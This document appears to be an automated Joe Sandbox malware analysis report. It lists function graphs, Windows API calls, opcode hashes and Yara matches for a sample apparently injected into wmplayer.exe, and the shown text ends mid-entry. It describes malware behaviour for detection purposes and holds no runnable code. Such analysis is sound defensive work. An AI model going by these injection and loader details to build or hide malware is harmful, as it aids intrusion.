                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: f9be979bef19bd5ab663b47a733f24f502624efffbdecf5185bfad4a79495885
                                              • Instruction ID: cd88abf323c65619e171b5c21e56360c0d77613f13379f5848b268de6e36ea64
                                              • Opcode Fuzzy Hash: f9be979bef19bd5ab663b47a733f24f502624efffbdecf5185bfad4a79495885
                                              • Instruction Fuzzy Hash: B5412A3090CB884FD719DBA898566E97FF1EF57321F0442AFD049C3192CB696856C792
                                              Function 00007FFD34680921 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2219 7ffd34680921-7ffd346809cc FreeConsole 2223 7ffd346809d4-7ffd346809fb 2219->2223 2224 7ffd346809ce 2219->2224 2224->2223
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConsoleFree
                                              • String ID:
                                              • API String ID: 771614528-0
                                              • Opcode ID: 0783ab2059d0b3ec9ccd81e58a5a9114abea6deff02638c6fdf2c5cb48973d67
                                              • Instruction ID: b8459cff84d9ac177bb460160e7e139fd1a74a07bc2dfce965df4a607cc1d4ad
                                              • Opcode Fuzzy Hash: 0783ab2059d0b3ec9ccd81e58a5a9114abea6deff02638c6fdf2c5cb48973d67
                                              • Instruction Fuzzy Hash: 1931C43150CB488FDB65DFA8C856BEA7BF4EF56320F04416FD089C3552DB68A846CB51
                                              Function 00007FFD347611FB Relevance: .4, Instructions: 399COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 347b3325ba73ef1e37d267398c75f2db8a7207cc8ea119eaeb392a0db7c7c2ea
                                              • Instruction ID: e1535ac52f01d7f75dca4e0b52a338439279de93ca11af81b93c5ef0b2ea166c
                                              • Opcode Fuzzy Hash: 347b3325ba73ef1e37d267398c75f2db8a7207cc8ea119eaeb392a0db7c7c2ea
                                              • Instruction Fuzzy Hash: 77C12CB2A0DB858FE752DB2C88AA1A47FE1FF56320B0901BAD5C9C7593D91C7806D3D1
                                              Function 00007FFD347601C3 Relevance: .2, Instructions: 178COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a7df844215f3eb9a7404517d46040bb79dba4596461a4959de87e5126f214af
                                              • Instruction ID: fa0d509c3395de2608f46a9e7d4eb6b6b6d56faad242061d8deff36c03a40d09
                                              • Opcode Fuzzy Hash: 8a7df844215f3eb9a7404517d46040bb79dba4596461a4959de87e5126f214af
                                              • Instruction Fuzzy Hash: FB51D471A08A898FDB69DF18C8E16A877E2FF65314F1401AEC10AC7186DF3CB845DB80
                                              Function 00007FFD34760A04 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48db7f160d7d5f727eedd961ed629a4995b39a1c17eed555425722c454b6fd2d
                                              • Instruction ID: 1b028a8c354a3a98ecac9bb227c361b8b679e2fe5ef8598827241e0042c09acd
                                              • Opcode Fuzzy Hash: 48db7f160d7d5f727eedd961ed629a4995b39a1c17eed555425722c454b6fd2d
                                              • Instruction Fuzzy Hash: A5E01A30A046288EDF60DB48DC81BD9B3B1FB89300F0041E5D54DE3241CA306A84CF42

                                              Non-executed Functions

                                              Function 00007FFD34688B38 Relevance: 11.9, Strings: 9, Instructions: 603COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @Os4$L_^$L_^$L_^$L_^$L_^$L_^$L_S$POs4
                                              • API String ID: 0-2269739461
                                              • Opcode ID: 616452db6e52f0ab3bc6c91dba55e0e22bcfd1adcf6412b134117b961dd0340b
                                              • Instruction ID: 2d73290171fe76c81056cf5b9c84c43ab2d41586898f814a95f5a2546a4716cc
                                              • Opcode Fuzzy Hash: 616452db6e52f0ab3bc6c91dba55e0e22bcfd1adcf6412b134117b961dd0340b
                                              • Instruction Fuzzy Hash: 5B12C9A3E0D6A20BE7526BBC98F50F73B94EF6326C70C10F6D2DC9A093ED1D640A5645
                                              Function 00007FFD346947F9 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: gfff
                                              • API String ID: 0-1553575800
                                              • Opcode ID: f423c8f2a46527160002898adc4d8e634b45daa83ab3dce9ee6be51f7f0ca5f9
                                              • Instruction ID: 7f42c98bc5e2f23ed9450e6978b8c6702415ac0f09eac1b2cad4cf44ff6c667a
                                              • Opcode Fuzzy Hash: f423c8f2a46527160002898adc4d8e634b45daa83ab3dce9ee6be51f7f0ca5f9
                                              • Instruction Fuzzy Hash: E051233260D7950FD31A8A7D5C560A17FE6DB8322070A82FFD5C6CB1A7E9596C0BC392

                                              Execution Graph

                                              Execution Coverage:1.5%
                                              Dynamic/Decrypted Code Coverage:4.7%
                                              Signature Coverage:8.1%
                                              Total number of Nodes:149
                                              Total number of Limit Nodes:15
                                              execution_graph 77571 424303 77572 424312 77571->77572 77573 424359 77572->77573 77576 424397 77572->77576 77578 42439c 77572->77578 77579 42d0a3 77573->77579 77577 42d0a3 RtlFreeHeap 77576->77577 77577->77578 77582 42b4c3 77579->77582 77581 424369 77583 42b4dd 77582->77583 77584 42b4ee RtlFreeHeap 77583->77584 77584->77581 77585 42e183 77586 42e193 77585->77586 77587 42e199 77585->77587 77590 42d183 77587->77590 77589 42e1bf 77593 42b473 77590->77593 77592 42d19e 77592->77589 77594 42b490 77593->77594 77595 42b4a1 RtlAllocateHeap 77594->77595 77595->77592 77596 42a7a3 77597 42a7c0 77596->77597 77600 3312df0 LdrInitializeThunk 77597->77600 77598 42a7e8 77600->77598 77661 423f73 77662 423f8f 77661->77662 77663 423fb7 77662->77663 77664 423fcb 77662->77664 77665 42b163 NtClose 77663->77665 77666 42b163 NtClose 77664->77666 77668 423fc0 77665->77668 77667 423fd4 77666->77667 77671 42d1c3 RtlAllocateHeap 77667->77671 77670 423fdf 77671->77670 77672 3312b60 LdrInitializeThunk 77601 41ac03 77602 41ac47 77601->77602 77604 41ac68 77602->77604 77605 42b163 77602->77605 77606 42b180 77605->77606 77607 42b191 NtClose 77606->77607 77607->77604 77608 41a103 77609 41a11b 77608->77609 77611 41a175 77608->77611 77609->77611 77612 41dd23 77609->77612 77613 41dd49 77612->77613 77619 41de40 77613->77619 77621 42e2b3 77613->77621 77615 41dddb 77616 41de37 77615->77616 77615->77619 77632 42a7f3 77615->77632 77616->77619 77627 4278d3 77616->77627 77619->77611 77620 41deed 77620->77611 77622 42e223 77621->77622 77623 42e280 77622->77623 77624 42d183 RtlAllocateHeap 77622->77624 77623->77615 77625 42e25d 77624->77625 77626 42d0a3 RtlFreeHeap 77625->77626 77626->77623 77628 427930 77627->77628 77629 42796b 77628->77629 77636 4185a3 77628->77636 77629->77620 77631 42794d 77631->77620 77633 42a810 77632->77633 77644 3312c0a 77633->77644 77634 42a83c 77634->77616 77637 418586 77636->77637 77639 4185cf 77637->77639 77641 42b513 77637->77641 77639->77631 77640 41858b 77640->77631 77642 42b52d 77641->77642 77643 42b53e ExitProcess 77642->77643 77643->77640 77645 3312c11 77644->77645 77646 3312c1f LdrInitializeThunk 77644->77646 77645->77634 77646->77634 77647 413bc3 77648 413bdc 77647->77648 77653 4175a3 77648->77653 77650 413bfa 77651 413c33 PostThreadMessageW 77650->77651 77652 413c46 77650->77652 77651->77652 77655 4175c7 77653->77655 77654 4175ce 77654->77650 77655->77654 77656 417603 LdrLoadDll 77655->77656 77657 41761a 77655->77657 77656->77657 77657->77650 77673 413894 77674 413898 77673->77674 77675 41374f 77673->77675 77676 4137ed 77675->77676 77679 42b3d3 77675->77679 77680 42b3f0 77679->77680 77683 3312c70 LdrInitializeThunk 77680->77683 77681 413765 77683->77681 77658 4187a8 77659 42b163 NtClose 77658->77659 77660 4187b2 77659->77660 77684 40193f 77685 401961 77684->77685 77688 42e643 77685->77688 77691 42cc33 77688->77691 77692 42cc7c 77691->77692 77703 407343 77692->77703 77694 42cc92 77702 4019d7 77694->77702 77706 41aa13 77694->77706 77696 42ccb1 77697 42ccc6 77696->77697 77698 42b513 ExitProcess 77696->77698 77717 427243 77697->77717 77698->77697 77700 42ccd5 77701 42b513 ExitProcess 77700->77701 77701->77702 77721 4162d3 77703->77721 77705 407350 77705->77694 77707 41aa3f 77706->77707 77732 41a903 77707->77732 77710 41aa84 77713 41aaa0 77710->77713 77715 42b163 NtClose 77710->77715 77711 41aa6c 77712 41aa77 77711->77712 77714 42b163 NtClose 77711->77714 77712->77696 77713->77696 77714->77712 77716 41aa96 77715->77716 77716->77696 77718 42729d 77717->77718 77720 4272aa 77718->77720 77743 4180f3 77718->77743 77720->77700 77722 4162ea 77721->77722 77724 416303 77722->77724 77725 42bbb3 77722->77725 77724->77705 77727 42bbcb 77725->77727 77726 42bbef 77726->77724 77727->77726 77728 42a7f3 LdrInitializeThunk 77727->77728 77729 42bc44 77728->77729 77730 42d0a3 RtlFreeHeap 77729->77730 77731 42bc5a 77730->77731 77731->77724 77733 41a91d 77732->77733 77737 41a9f9 77732->77737 77738 42a893 77733->77738 77736 42b163 NtClose 77736->77737 77737->77710 77737->77711 77739 42a8b0 77738->77739 77742 33135c0 LdrInitializeThunk 77739->77742 77740 41a9ed 77740->77736 77742->77740 77744 41811d 77743->77744 77745 41858b 77744->77745 77751 413cf3 77744->77751 77745->77720 77747 41822a 77747->77745 77748 42d0a3 RtlFreeHeap 77747->77748 77749 418242 77748->77749 77749->77745 77750 42b513 ExitProcess 77749->77750 77750->77745 77753 413d12 77751->77753 77752 413e30 77752->77747 77753->77752 77755 413743 LdrInitializeThunk 77753->77755 77755->77752

                                              Executed Functions

                                              Function 004175A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 43 4175a3-4175bf 44 4175c7-4175cc 43->44 45 4175c2 call 42dda3 43->45 46 4175d2-4175e0 call 42e2c3 44->46 47 4175ce-4175d1 44->47 45->44 50 4175f0-417601 call 42c703 46->50 51 4175e2-4175ed call 42e563 46->51 56 417603-417617 LdrLoadDll 50->56 57 41761a-41761d 50->57 51->50 56->57
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417615
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction ID: 5d08c72099d3dbde0b51c66012d470f39d4ef48f62ca1c3c6c9939ae70570b0e
                                              • Opcode Fuzzy Hash: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction Fuzzy Hash: 830121B5E0420DBBDF10DBE5DC42FDEB3B89B54308F00859AE90897240F635EB548B95
                                              Function 0042B163 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 74 42b163-42b19f call 4047c3 call 42c213 NtClose
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction ID: 94777ef20ef518cb4d08996e308a4c9858104ec833bab855de29d4310d2d073e
                                              • Opcode Fuzzy Hash: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction Fuzzy Hash: 8BE04F326402147BD660AB9ADC41F9B776DDBC5754F10801AFA0867142CAB4790487B5
                                              Function 033135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 91 33135c0-33135cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 0586f5fc49bc15c193759133553318dd32e8898772b328197d5b8290e5b2ad85
                                              • Instruction ID: a660a1f62713a2171568816381a008f9d7639f1f026919283d8cc93732109939
                                              • Opcode Fuzzy Hash: 0586f5fc49bc15c193759133553318dd32e8898772b328197d5b8290e5b2ad85
                                              • Instruction Fuzzy Hash: 1290023561551802D100B15C4555706140587D0201F66C411A0424968D8B958A5165A2
                                              Function 03312B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 88 3312b60-3312b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: aed1b1310cdcbb3b7cfa9cc30a41f20d728532a9bf35beef95604b5cf5881c91
                                              • Instruction ID: e473d8c33a42e1db2a86637cb561f0a9a8299d8a757c9949472631ee6ff58dc3
                                              • Opcode Fuzzy Hash: aed1b1310cdcbb3b7cfa9cc30a41f20d728532a9bf35beef95604b5cf5881c91
                                              • Instruction Fuzzy Hash: 35900275212414034105B15C4455616440A87E0201B56C021E1014990DCA2589916125
                                              Function 03312DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 90 3312df0-3312dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8115d99ce51aa62b50a2ad0acca0fdf4122e173c523fd07a0e577ff0e552772a
                                              • Instruction ID: c86c6d0f424a17ba75f4ad480afc5ba5d079f911cee66643981a0fd03e5dbeaf
                                              • Opcode Fuzzy Hash: 8115d99ce51aa62b50a2ad0acca0fdf4122e173c523fd07a0e577ff0e552772a
                                              • Instruction Fuzzy Hash: 9790023521141813D111B15C4545707040987D0241F96C412A0424958D9B568A52A121
                                              Function 03312C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 89 3312c70-3312c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 29dde4663fd634ded9d2a8dbf859254ad2c0625c7b16e53f64376662d3190525
                                              • Instruction ID: e01206770895e471646b0fd8ad0174c716a96f8a22702ec9cec533bb15e99392
                                              • Opcode Fuzzy Hash: 29dde4663fd634ded9d2a8dbf859254ad2c0625c7b16e53f64376662d3190525
                                              • Instruction Fuzzy Hash: DC90023521149C02D110B15C844574A040587D0301F5AC411A4424A58D8B9589917121
                                              Function 00413BBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 00413C40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 711709d2267b69b9b56d911ec9c934cd4a2ad43c544ea22a81b19540be7437f5
                                              • Instruction ID: c023f9eb8de3e71753128f9afae4a8744ab15f90d3ef21adad86f863b3564a78
                                              • Opcode Fuzzy Hash: 711709d2267b69b9b56d911ec9c934cd4a2ad43c544ea22a81b19540be7437f5
                                              • Instruction Fuzzy Hash: F7112B71E4521876EB20AA91DC02FDF7B7C9F81B58F008069FB147B2C1E6B857068BE5
                                              Function 00413BC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 00413C40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 90abb6b130caa16273304346ba0cc400d8ed268c403604587ceb24bfe58e5115
                                              • Instruction ID: 2ee58dd9a766312a1d0a4e92cdbfa478a3eff213c7b34c8ead5b90bd152a33b3
                                              • Opcode Fuzzy Hash: 90abb6b130caa16273304346ba0cc400d8ed268c403604587ceb24bfe58e5115
                                              • Instruction Fuzzy Hash: 7701D671E4521876EB21AA91DC02FDF7B7C9F41B54F008069FB147B281E6B857068BE5
                                              Function 0042B4C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 38 42b4c3-42b504 call 4047c3 call 42c213 RtlFreeHeap
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B4FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: QcA
                                              • API String ID: 3298025750-3711227127
                                              • Opcode ID: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction ID: 851bf7ecfc53e67bf59877b010cc35dcbf0d875e6266b59784c7832328102d5c
                                              • Opcode Fuzzy Hash: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction Fuzzy Hash: 5FE06DB1604205BBD610EE99EC81FAB37ADDFC9710F004029FA08A7242DB74B9108AB9
                                              Function 00417649 Relevance: 1.5, APIs: 1, Instructions: 41libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 58 417649-417652 59 417654-41766b 58->59 60 4175ed-417601 call 42c703 58->60 64 417646 59->64 65 41766d 59->65 67 417603-417617 LdrLoadDll 60->67 68 41761a-41761d 60->68 64->58 65->65 67->68
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417615
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction ID: 7ba332da1f44ace5ef9f5db375416641dd8a3bd251ab81bc5c3b061f369dffe3
                                              • Opcode Fuzzy Hash: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction Fuzzy Hash: D8F04C71A445096FDF00CBA4CC81FEDB7B0EB95314F408B55D914971C1E630DA868B81
                                              Function 0042B473 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 69 42b473-42b4b7 call 4047c3 call 42c213 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B4B2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction ID: 919647529a804f162326e76d8678589544dedf5e8d0bbe49049d2f73312e9cab
                                              • Opcode Fuzzy Hash: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction Fuzzy Hash: 50E06D756442057BD610EE99DC81F9B73ACEFC5710F004419FA1CA7242C670B9108AB5
                                              Function 0042B513 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 79 42b513-42b54c call 4047c3 call 42c213 ExitProcess
                                              APIs
                                              • ExitProcess.KERNEL32(?,00000000,?,?,2ACAF52E,?,?,2ACAF52E), ref: 0042B547
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 154f4f7aa3232ef432045ca40a0bd76ef0ef0f5d485d579874c7ec4e1bf8844a
                                              • Instruction ID: 76d58355d569976f8bb3094186e29b1597798a054e1ffe9f7571adeae244c507
                                              • Opcode Fuzzy Hash: 154f4f7aa3232ef432045ca40a0bd76ef0ef0f5d485d579874c7ec4e1bf8844a
                                              • Instruction Fuzzy Hash: C3E086756102147BD520FB9ADC41F9B775DDFC5714F004119FA18A7142C7B1BA1187F4
                                              Function 03312C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 84 3312c0a-3312c0f 85 3312c11-3312c18 84->85 86 3312c1f-3312c26 LdrInitializeThunk 84->86
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 83640d807008118239bb1eeeb6e76212c3ce4abb0cf836cd9fe838cc6d101f62
                                              • Instruction ID: 8392e7100516da9b91d4aede6b2c0bf4a2de455b29fcd00f2bfbe7a0b7123e25
                                              • Opcode Fuzzy Hash: 83640d807008118239bb1eeeb6e76212c3ce4abb0cf836cd9fe838cc6d101f62
                                              • Instruction Fuzzy Hash: 75B09B719015D5C6DA15E7644A497177D0467D0701F1AC461D3034641E4739C1D1E175

                                              Non-executed Functions

                                              Function 03352349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2160512332
                                              • Opcode ID: a25f2cbef6c99a989828521aa5e8e9d99edf8b7159409453dcd15da37e3aa179
                                              • Instruction ID: e051f65b254763810e8fa08c4fe466643cea305e78ce2b4092f663e98439b76b
                                              • Opcode Fuzzy Hash: a25f2cbef6c99a989828521aa5e8e9d99edf8b7159409453dcd15da37e3aa179
                                              • Instruction Fuzzy Hash: 9D925775618341AFE724DE24C880F6BB7E8BB88754F084D2DFA95DB251D770E884CB92
                                              Function 03308620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                              Download Yara Rule
                                              Strings
                                              • Invalid debug info address of this critical section, xrefs: 033454B6
                                              • Thread identifier, xrefs: 0334553A
                                              • undeleted critical section in freed memory, xrefs: 0334542B
                                              • 8, xrefs: 033452E3
                                              • double initialized or corrupted critical section, xrefs: 03345508
                                              • Critical section address., xrefs: 03345502
                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03345543
                                              • Address of the debug info found in the active list., xrefs: 033454AE, 033454FA
                                              • Critical section address, xrefs: 03345425, 033454BC, 03345534
                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0334540A, 03345496, 03345519
                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033454CE
                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033454E2
                                              • Critical section debug info address, xrefs: 0334541F, 0334552E
                                              • corrupted critical section, xrefs: 033454C2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
